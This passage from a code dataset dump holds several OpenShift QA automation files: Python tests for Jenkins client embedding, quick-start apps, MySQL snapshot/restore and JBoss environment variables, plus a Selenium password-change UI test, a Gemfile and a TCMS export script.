= common.getRandomString()\n self.deployment_configuration = {\n \"php\": { \"index\" : \"php/index.php\" },\n \"zend\": { \"index\" : \"php/index.php\" },\n \"jbossas\" : { \"index\" : 
\"src/main/webapp/index.html\" },\n \"jbosseap\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews2\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"python\" : { \"index\" : \"wsgi/application\" },\n \"ruby\" : { \"index\" : \"config.ru\" },\n \"perl\" : { \"index\" : \"perl/index.pl\" },\n \"nodejs\" : { \"index\" : \"index.html\" },\n }\n self.deployment_configuration[\"ruby-1.9\"] = self.deployment_configuration[\"ruby\"]\n self.deployment_configuration[\"python-2.7\"] = self.deployment_configuration[\"python\"]\n self.deployment_configuration[\"python-3.3\"] = self.deployment_configuration[\"python\"]\n self.deployment_configuration[\"jbossews-2.0\"] = self.deployment_configuration[\"jbossews2\"]\n\n def finalize(self):\n pass\n #rmtree(self.app_name, ignore_errors = True)\n\nclass AddRemoveJenkinsClient(OpenShiftTest):\n \n def deploy_changes(self, source, destination):\n try:\n index_file = self.git_repo + \"/\" + self.deployment_configuration[self.test_variant][\"index\"]\n self.info(\"Editing: \" + index_file)\n for line in fileinput.input(index_file, inplace = True):\n print re.sub(source, destination, line),\n except:\n fileinput.close()\n self.info(\"IO error\")\n return False\n fileinput.close()\n \n return common.trigger_jenkins_build(self.git_repo)\n\n \n def test_method(self):\n self.info(\"=================================\")\n self.info(\"1. Check 'jenkins-client-*' in the output\")\n self.info(\"=================================\")\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"rhc cartridge list -l %s -p '%s' %s\" % ( self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n self.assert_true(ret_output.find(common.cartridge_types[\"jenkins\"]) != -1, \"Cartridge 'jenkins-client' must be shown in cartridge list\")\n \n self.info(\"=================================\")\n self.info(\"2. Create a jenkins app\")\n self.info(\"=================================\")\n ret_code = common.create_app(self.jenkins_name, common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False)\n self.assert_equal(ret_code, 0, \"Jenkins server must be created successfully\")\n \n self.info(\"=================================\")\n self.info(\"3. Create an application\")\n self.info(\"=================================\")\n ret_code = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"The app must be created successfully\")\n \n\tif self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\",\"jbossews-2.0\"):\n if self.config.options.run_mode==\"DEV\":\n # 20120605: the jenkins jobs now accept small profile\n pass\n # JBoss needs larger node profile to build\n #ret = common.change_node_profile(\"medium\")\n #self.assert_equal(ret, 0, \"Changing node profile to medium should pass\")\n #time.sleep(30)\n \n self.info(\"=================================\")\n self.info(\"4. Embed jenkins client to the app\")\n self.info(\"=================================\")\n ret_code = common.embed(self.app_name, \n \"add-\" + common.cartridge_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"Jenkins client must be embedded successfully\")\n \n self.info(\"=================================\")\n self.info(\"5. 
Make some change in the git repo and git push\")\n self.info(\"=================================\")\n ret_code = self.deploy_changes(\"Welcome to\", self.random_string)\n self.assert_equal(ret_code, True, \"Changes must be deployed successfully\")\n \n self.info(\"=================================\")\n self.info(\"6. Check the jenkins build urls\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(\n OSConf.default.conf['apps'][self.app_name]['embed']['jenkins-client-1.4']['url'],\n \"Last Successful Artifacts\",\n \"-v -L -k -H 'Pragma: no-cache' -u '%s:%s'\" % (OSConf.default.conf[\"apps\"][self.jenkins_name][\"username\"], OSConf.default.conf[\"apps\"][self.jenkins_name][\"password\"]),\n delay = 5, count = 10\n )\n self.assert_equal(ret_code, 0, \"Must be built successfully\")\n \n self.info(\"=================================\")\n self.info(\"7. Check the changes take effect\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), self.random_string)\n self.assert_equal(ret_code, 0, \"Changes must be found on the web-site\")\n \n self.info(\"=================================\")\n self.info(\"8. Remove jenkins client from the app\")\n self.info(\"=================================\")\n ret_code = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret_code, 0, \"Jenkins client must be removed successfully\")\n \n self.info(\"=================================\")\n self.info(\"9. Make some change and git push again\")\n self.info(\"=================================\")\n ret_code = self.deploy_changes(self.random_string, self.random_string2)\n self.assert_equal(ret_code, True, \"Changes must be deployed successfully\")\n \n self.info(\"=================================\")\n self.info(\"10.Check the changes take effect\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), self.random_string2, delay=5, count=8)\n self.assert_equal(ret_code, 0, \"Changes must be found on the web-site\")\n \n return self.passed(\"[US1178 & US1034] [rhc-cartridge] Add/Remove jenkins client for user app\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddRemoveJenkinsClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5137614607810974, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 17.16666603088379, "blob_id": "1e5079500b43d49b9a2857d049335e9a27496b5c", "content_id": "e77fbec0d39d29b3d9246ba6448ea5db62b0b7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 109, "license_type": "no_license", "max_line_length": 28, "num_lines": 6, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/ruby/Gemfile", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "source 'http://rubygems.org'\n\ngem 'sinatra'\ngem 'mongo', '1.6.4'\ngem 'bson', '1.6.4'\ngem 'bson_ext', '1.6.4'\n" }, { "alpha_fraction": 0.6277546286582947, "alphanum_fraction": 0.6289458274841309, "avg_line_length": 30.679244995117188, "blob_id": "93dd83a0f6c1a67cdff4b8cd194d7295e1d6f8b0", "content_id": "d900f9620adc2420dbff05bde7af3359100b0003", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1679, "license_type": "no_license", "max_line_length": 144, 
"num_lines": 53, "path": "/automation/open/testmodules/RT/quick_start/quick_start_juvia.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n\"\"\"\nimport os, sys\n\nimport common\nimport rhtest\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartJuvia(QuickStartTest):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Juvia\"\n self.config.git_upstream_url = \"git://github.com/openshift/juvia-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Welcome to Juvia\"\n \n def post_configuration_steps(self):\n steps = [\n \"cd %s\" % self.config.application_name,\n \"sed -i -e 's/\\$app/%s/g' -e 's/\\$domain/%s/g' config/application.yml\" % ( self.config.application_name, common.get_domain_name() ),\n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n self.assert_equal(ret_code, 0, \"Post-configuration step must be successful\")\n \n def pre_deployment_steps(self):\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git commit -a -m custom_configuration\" \n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n self.assert_equal(ret_code, 0, \"Post-configuration steps must be successful\")\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartJuvia)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6536540985107422, "alphanum_fraction": 0.6654561758041382, "avg_line_length": 36.982757568359375, "blob_id": "ce1a052e1a00ac1ff9b77a19cb1841c660f47a4a", "content_id": "7b740798461e63d32e8cf378753a266d245efdde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2203, "license_type": "no_license", "max_line_length": 113, "num_lines": 58, "path": "/automation/open/testmodules/UI/web/US1797_135712.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "'''\n [US1797][UI][Account Management]Change password from \"My Account\" page with invalid old password [P1]\n author: [email protected]\n'''\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135712(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n \n def test_u_s1797135712(self):\n driver = self.driver\n baseutils.login(self, self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n baseutils.go_to_account_page(self)\n\n\n driver.find_element_by_link_text(\"Change password...\").click()\n baseutils.wait_element_present_by_id(self, \"web_user_old_password\")\n self.assertEqual(\"OpenShift by Red Hat | OpenShift Change Password\", driver.title)\n\n driver.find_element_by_id(\"web_user_old_password\").clear()\n 
driver.find_element_by_id(\"web_user_old_password\").send_keys(self.cfg.password)\n\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(\"abcabc\")\n\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"abcabb\\t\")\n driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self, \"Passwords must match\", \"id('web_user_password_input')/div/p\")\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5956535935401917, "alphanum_fraction": 0.5969706773757935, "avg_line_length": 34.72941207885742, "blob_id": "5be038a9570a8c19621007b9825409334ecc8d3e", "content_id": "9a0e3d6cb1fdcdcc56e7968e952fc04d5c1a62ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3037, "license_type": "no_license", "max_line_length": 98, "num_lines": 85, "path": "/automation/open/bin/export_tcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport database\nimport tcms_base\nimport logging, logging.handlers\nimport sys\nfrom optparse import OptionParser\n\ndef config_logger():\n # create formatter\n formatter = logging.Formatter(\"%(levelname)s [%(asctime)s] %(message)s\",\n \"%H:%M:%S\")\n logger = logging.getLogger(\"dump_logs\")\n log_formatter = logging.Formatter(\n \"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\n \n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(stream_handler)\n return logger\n\nlog = config_logger()\nparser = OptionParser()\n\n\ndef config_parser():\n # these are required options.\n parser.add_option(\"-u\", \"--update\", default='all', \n help=\"update the tcms_tags table with the latest dump from TCMS\")\n parser.add_option(\"-q\", \"--query\", \n help=\"query database to return testcases (tag_name|testcase_id) JSON string.\")\n parser.add_option(\"-t\", \"--testcases\", default='all', \n help=\"'all' default to all testcases, <testcase_id> to update a specific testcase_id\")\n parser.add_option(\"-c\", action=\"store_true\", dest=\"cases\", \n help=\"extract all testcase ids into a list\")\n (options, args) = parser.parse_args()\n \n return options, args\n\nif __name__ == '__main__':\n (options, args)= config_parser()\n \n if options.update:\n tcms = tcms_base.TCMS(test_plan='Test Plan for OpenShift 2.0')\n if options.update == 'all':\n # no name given then we update all tags\n tags, tags_obj = tcms.get_case_tags()\n for tag, tag_obj in zip(tags, tags_obj):\n log.info(\"Updating JSON for tag '%s'\" % tag)\n database.populate_tcms_testcases_by_tag(tcms, tag_obj)\n else:\n name = options.update\n log.info(\"Updating JSON for tag '%s' in DB\" % name)\n tag, tag_obj = tcms.get_case_tags(tag_name=name)\n database.populate_tcms_testcases_by_tag(tcms, tag_obj)\n\n \n elif options.query:\n try:\n case_id = int(options.query)\n testcase_dict = database.get_testcase_by_id(case_id)\n print testcase_dict\n except:\n tag_name = options.query\n tc_json = 
database.get_testcases_json_by_tag(tag_name)\n print tc_json\n elif options.testcases:\n tcms = tcms_base.TCMS(test_plan='Test Plan for OpenShift 2.0')\n if options.testcases == 'all':\n # update all testcases\n cases = tcms.get_testcases()\n for testcase in cases:\n res = database.populate_tcms_testcases(testcase, \n plan_id=tcms.plan_id)\n else:\n # just update a specific testcase id\n print \"Not supported at this time\"\n \n elif options.cases:\n res = database.get_all_tcms_testcases()\n print res\n else:\n pass\n" }, { "alpha_fraction": 0.440688818693161, "alphanum_fraction": 0.4502202570438385, "avg_line_length": 49.95918273925781, "blob_id": "b0e4b8b8a60dcadebdf49ebc24bc5f2ca4a3c11b", "content_id": "255c35a642c3735aa9c8828b39d3e02769f0ceba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12485, "license_type": "no_license", "max_line_length": 123, "num_lines": 245, "path": "/automation/open/testmodules/RT/client/snapshot_restore_mysql_data_to_existing_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport common, OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info((\"[US566][rhc-client] Archive/Restore app with embeded \"\n \"mysql db data to updated application\\n\"\n \"[US569][rhc-cartridge] embed MySQL instance to an app\"))\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing variant. Running test with default zend\")\n self.test_variant = \"jbossews\"\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"rack\", \"ruby\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"wsgi\", \"python\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-2.7\"):\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR,\n file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-3.3\"):\n file_name = \"applicationpython-3.3.py\"\n source_file 
= \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR,\n file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n file_name = \"test_ews.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\"% (WORK_DIR,\n file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\"% (WORK_DIR,\n file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Unknown variant:%s\"%self.test_variant)\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n self.key_string1 = \"speaker1, title1\"\n self.key_string2 = \"speaker2, title2\"\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreMysqlDataToExistingApp(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, \n self.user_email, self.user_passwd],\n expect_return = 0,\n expect_description = \"App should be created successfully\")\n\t\n self.add_step(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Add mysql to this app\",\n common.embed,\n function_parameters = [self.app_name, \"add-mysql-5.1\", \n self.user_email, self.user_passwd],\n expect_return = 0)\n\n self.add_step(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return = 0)\n\n self.add_step(\"Get embeded mysql info - password\",\n OSConf.get_embed_info,\n function_parameters = [self.app_name, \n \"mysql-5.1\", \n \"password\"])\n self.add_step(\"Get embeded mysql info - url\",\n OSConf.get_embed_info,\n function_parameters = [self.app_name,\n \"mysql-5.1\",\n \"url\"])\n self.add_step(\"Get embeded mysql info - username\",\n OSConf.get_embed_info,\n function_parameters = [self.app_name,\n \"mysql-5.1\",\n \"username\"])\n if self.test_variant in (\"rack\", \"ruby-1.9\", \"ruby\"):\n modify_file = \"%s/config.ru\" %(self.app_name)\n else:\n modify_file = self.target_file\n if self.test_variant in (\"jbossas\",\"jbosseap\"):\n command = (\"echo 'Skip this step for jbossas app, because \"\n \"these are done automatcially by jboss server \"\n \"at server side'\")\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n command = ( \"cd %s/src/main/webapp/ && \"\n \" mkdir -p WEB-INF/lib && \"\n \" cp %s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar WEB-INF/lib/ \"\n ) % (self.app_name, WORK_DIR)\n elif self.test_variant == \"python-2.7\":\n command = (\"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql.py %s/setup.py && \"\n #\"sed -i -e \\\"s/^.*install_requires.*$/ install_requires=['MySQL-python'],/g\\\" %s/setup.py && \"\n \"sed -i -e '{s/changeme_username/__OUTPUT__[7]/}' \"\n \" -e '{s/changeme_password/__OUTPUT__[5]/}'\"\n \" -e 
'{s/changeme_url/__OUTPUT__[6]/}' \"\n \" -e '{s/changeme_db/%s/}' %s\" )%(WORK_DIR,self.app_name, \n self.app_name,\n modify_file)\n elif self.test_variant == \"python-3.3\":\n command = (\"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql33.py %s/setup.py && \"\n\t\t\t#\"sed -i -e \\\"s/^.*install_requires.*$/ install_requires=['mysql-connector-python'],/g\\\" %s/setup.py && \"\n \"sed -i -e '{s/changeme_username/__OUTPUT__[7]/}' \"\n \" -e '{s/changeme_password/__OUTPUT__[5]/}'\"\n \" -e '{s/changeme_url/__OUTPUT__[6]/}' \"\n \" -e '{s/changeme_db/%s/}' %s\" )%(WORK_DIR,self.app_name,self.app_name,\n modify_file)\n else:\n command = (\"sed -i -e '{s/changeme_username/__OUTPUT__[7]/}' \"\n \" -e '{s/changeme_password/__OUTPUT__[5]/}'\"\n \" -e '{s/changeme_url/__OUTPUT__[6]/}' \"\n \" -e '{s/changeme_db/%s/}' %s\" )%(self.app_name, \n modify_file)\n self.add_step(\"Modify test files according to mysql info\",\n command,\n expect_return = 0)\n self.add_step(\"Do git commit\",\n (\"cd %s && git add . && git commit -m test \"\n \" && git push\")% (self.app_name),\n expect_description = (\"File and directories are added \"\n \"to your git repo successfully\"),\n expect_return = 0)\n self.add_step(\"Access app's URL to create mysql data\",\n \"curl -s -H 'Pragma:no-cache' __OUTPUT__[2]/%s\" %(self.url_path1),\n expect_str = [\"Welcome\", self.key_string1],\n try_interval = 12,\n try_count = 10,\n expect_return = 0)\n self.add_step(\"Take snapshot\",\n (\"rhc snapshot save %s -f %s %s \"\n \" -l %s -p '%s'\")% ( self.app_name, \n \"%s.tar.gz\"%(self.app_name),\n common.RHTEST_RHC_CLIENT_OPTIONS,\n self.user_email, \n self.user_passwd),\n expect_return = 0)\n self.add_step(\"Access app's URL to create modify mysql data\",\n \"curl -s -H 'Pragma:no-cache' __OUTPUT__[2]/%s\" %(self.url_path2),\n expect_return = 0,\n expect_str = [\"Welcome\", self.key_string2],\n try_interval = 12,\n try_count = 10)\n self.add_step(\"Restore app from snapshot\", \n (\"rhc snapshot restore %s -f %s %s \"\n \"-l %s -p '%s'\") %( self.app_name, \n \"%s.tar.gz\"%(self.app_name), \n common.RHTEST_RHC_CLIENT_OPTIONS,\n self.user_email, \n self.user_passwd),\n expect_return = 0)\n self.add_step(\"Access app's URL to check mysql data is restored\",\n \"curl -s -H 'Pragma:no-cache' __OUTPUT__[2]/%s\" %(self.url_path3),\n expect_str = [\"Welcome\", self.key_string1],\n try_interval = 12,\n try_count = 10,\n expect_return = 0)\n self.add_step(\"Remove mysql from this app\",\n common.embed,\n function_parameters = [self.app_name, \"remove-mysql-5.1\", \n self.user_email, self.user_passwd],\n expect_return = 0)\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMysqlDataToExistingApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7158930897712708, "alphanum_fraction": 0.7158930897712708, "avg_line_length": 24.39285659790039, "blob_id": "0d93ff235f525962539cdd7b54124f33ccc3620d", "content_id": "1512d695736183306c99f6157db332cb112d008e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 711, "license_type": "no_license", "max_line_length": 63, "num_lines": 28, "path": "/automation/open/testmodules/RT/quick_start/quick_start_phpMongoTweet_zend.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env 
python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_phpMongoTweet import QuickStartPhpMongoTweet\n\nclass QuickStartPhpMongoTweetZend(QuickStartPhpMongoTweet):\n \n def __init__(self, config):\n QuickStartPhpMongoTweet.__init__(self, config)\n self.config.application_type = common.app_types[\"zend\"]\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartPhpMongoTweetZend)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6322722434997559, "alphanum_fraction": 0.6417855620384216, "avg_line_length": 30.959064483642578, "blob_id": "37853f25d21325e669731ec210afb58c01780714", "content_id": "dbf2e49455c6a9564f3bcfbcbdd75e27cd60ff71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5466, "license_type": "no_license", "max_line_length": 163, "num_lines": 171, "path": "/automation/open/testmodules/RT/cartridge/jboss_env_vars.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: jboss_env_vars.py\n# Date: 2012/03/02 01:00\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1174] [rhc-cartridge] Import environment variables as system properties for jbossas-7.0 application\"\n self.app_name = 'jbossenv'\n self.app_type = 'jbossas'\n tcms_testcase_id = \t122366\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass JbossEnvVars(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a JBoss app\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with MySQL\",\n common.embed,\n function_parameters=[self.app_name, 'add-%s'%common.cartridge_types['mysql'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n #3\n self.steps_list.append(testcase.TestCaseStep(\"Embed with MySQL\",\n '''\n cd %s &&\n cat <<'EOF' >src/main/webapp/test.jsp &&\n<%%@ page contentType=\"text/html\" language=\"java\" import=\"java.sql.*\" %%>\n<%%@ page import=\"javax.naming.*\" %%>\n<%%@ page import=\"javax.sql.*\" %%>\n\n\n<%%\nout.println(\"Welcome~\");\n\nString action=request.getParameter(\"action\");\nout.println(\"-\"+request.getParameter(\"action\")+\"-\");\n\nif (action == null) {\n action=\"\";\n}\n\nString context = \"\";\nif (action.equals(\"create\")) {\n InitialContext ctx = new InitialContext();\n DataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\n Connection connection=ds.getConnection();\n Statement statement = connection.createStatement();\n statement.executeUpdate(\"DROP TABLE IF EXISTS ucctalk\");\n statement.executeUpdate(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\");\n statement.executeUpdate(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker1', 'title1')\");\n ResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\n 
ResultSetMetaData rmeta = rs.getMetaData();\n int numColumns=rmeta.getColumnCount();\n while(rs.next()) {\n context = context + rs.getString(1) + \", \" + rs.getString(2) + \"\\\\\\\\n\";\n }\n rs.close();\n statement.close();\n connection.close();\n\n out.print(context);\n} else if (action.equals(\"modify\")) {\n InitialContext ctx = new InitialContext();\n DataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\n Connection connection=ds.getConnection();\n Statement statement = connection.createStatement();\n statement.executeUpdate(\"DROP TABLE IF EXISTS ucctalk\");\n statement.executeUpdate(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\");\n statement.executeUpdate(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker2', 'title2')\");\n ResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\n ResultSetMetaData rmeta = rs.getMetaData();\n int numColumns=rmeta.getColumnCount();\n while(rs.next()) {\n context = context + rs.getString(1) + \", \" + rs.getString(2) + \"\\\\\\\\n\";\n }\n rs.close();\n statement.close();\n connection.close();\n\n out.print(context);\n} else {\n InitialContext ctx = new InitialContext();\n DataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\n Connection connection=ds.getConnection();\n Statement statement = connection.createStatement();\n ResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\n ResultSetMetaData rmeta = rs.getMetaData();\n int numColumns=rmeta.getColumnCount();\n while(rs.next()) {\n context = context + rs.getString(1) + \", \" + rs.getString(2) + \"\\\\\\\\n\";\n }\n rs.close();\n statement.close();\n connection.close();\n\n out.print(context);\n}\n\n\n%%>\nEOF\n git add src/main/webapp/test.jsp && \n git commit -m \"Added test.jsp\" -a &&\n git push\n'''%(self.app_name),\n expect_return=0))\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n r = common.grep_web_page(\"http://%s/test.jsp?action=create\"%url, ['Welcome~','-create-','speaker1, title1'])\n return r\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\"Verify the test.jsp\",\n verify,\n function_parameters = [self],\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n case.add_clean_up(\"rm -rf %s\"%(self.app_name))\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossEnvVars)\n return suite\n\ndef run(conf):\n 